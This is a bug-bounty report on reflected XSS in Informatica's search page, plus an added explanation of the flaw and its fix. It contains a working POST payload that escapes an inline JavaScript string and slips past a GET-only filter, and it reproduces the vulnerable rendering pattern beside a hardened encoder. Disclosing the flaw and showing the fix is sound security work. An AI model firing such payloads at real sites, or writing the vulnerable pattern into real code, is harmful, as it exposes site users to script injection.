Informatica: Search XSS

ID H1:200034
Type hackerone
Reporter s_p_q_r
Modified 2017-05-22T04:08:23


The search query parameter is interpolated into inline JavaScript that sets a localStorage item:

```javascript
localStorage.setItem("searchTerm", "%foo%");
```

Attempts to inject XSS payloads are blocked by redirection that removes special chars from the URL:

```http
GET /search-solr.jspa?q=aaa%22bbb%27ccc%3Cddd%3Eeee HTTP/1.1
Host:

HTTP/1.0 302 Found
Location:
```

However, it turns out the search parameter can also be submitted via POST, and the following request pops up an alert:

```http
POST /search-solr.jspa HTTP/1.1
Host:

q=%22-alert%28document.domain%29-%22
```


Tested with latest Firefox and Chrome.
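The two weaknesses the report describes are (1) pasting the raw term into a JavaScript string literal and (2) filtering only the GET path. As an added example (not code from the report or from Informatica), the snippet below shows the vulnerable rendering pattern beside a hardened one that encodes the value for inline-script context, and takes the term from either the query string or the POST body so the same encoding applies regardless of method. The template shape, the request objects and the helper names `encodeForInlineScript`, `extractSearchTerm` and `roundTrips` are assumptions made for this illustration; the sample requests are constructed from the report's GET and POST variants.

```javascript
// Added example, not Informatica's code. Assumed template shape:
//   localStorage.setItem("searchTerm", "<term>");
// where <term> arrives in the `q` parameter of a GET or a POST.

// Vulnerable pattern from the report: the raw term is spliced into a
// JavaScript string literal, so a double quote in the term ends the literal
// and whatever follows runs as code.
function renderSearchScriptVulnerable(term) {
  return `localStorage.setItem("searchTerm", "${term}");`;
}

// Hardened pattern: JSON.stringify produces a valid JS string literal with
// quotes, backslashes and control characters escaped. The extra replacements
// cover inline-script specifics that JSON.stringify leaves alone: "<" and ">"
// (so "</script>" or "<!--" can never appear in the markup) and the two
// Unicode line terminators.
function encodeForInlineScript(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderSearchScriptSafe(term) {
  return `localStorage.setItem("searchTerm", ${encodeForInlineScript(term)});`;
}

// Input handling must not depend on the HTTP method: the report's GET-only
// redirect was bypassed with POST. Read `q` from wherever it arrives and rely
// on output encoding rather than on stripping characters from the URL.
// `req` is a hypothetical minimal request object ({ method, query, body }).
function extractSearchTerm(req) {
  const source = req.method === "POST" ? req.body : req.query;
  const q = source && source.q;
  return typeof q === "string" ? q : "";
}

// Verifies that the encoded value is a single string literal that evaluates
// back to the original term, i.e. nothing in the term escaped the literal.
function roundTrips(term) {
  const literal = encodeForInlineScript(term);
  return new Function(`return ${literal};`)() === term;
}

// Constructed sample requests mirroring the report's two probes.
const PAYLOAD = '"-alert(document.domain)-"';
const POST_REQ = { method: "POST", query: {}, body: { q: PAYLOAD } };
const GET_REQ = { method: "GET", query: { q: 'aaa"bbb\'ccc<ddd>eee' }, body: {} };

if (typeof require !== "undefined" && require.main === module) {
  for (const req of [GET_REQ, POST_REQ]) {
    const term = extractSearchTerm(req);
    console.log("vulnerable :", renderSearchScriptVulnerable(term));
    console.log("safe       :", renderSearchScriptSafe(term));
    console.log("round-trips:", roundTrips(term));
  }
}
```

Running it prints, for the POST payload, a vulnerable line in which `-alert(document.domain)-` sits outside any string literal, and a safe line in which the whole term is one escaped literal; `roundTrips` confirms the safe encoding decodes to exactly the original term for both inputs. The general point is that a redirect-based URL filter is not an output encoder: the same user-controlled value reaches the same script context over POST, so the fix belongs at the point of rendering.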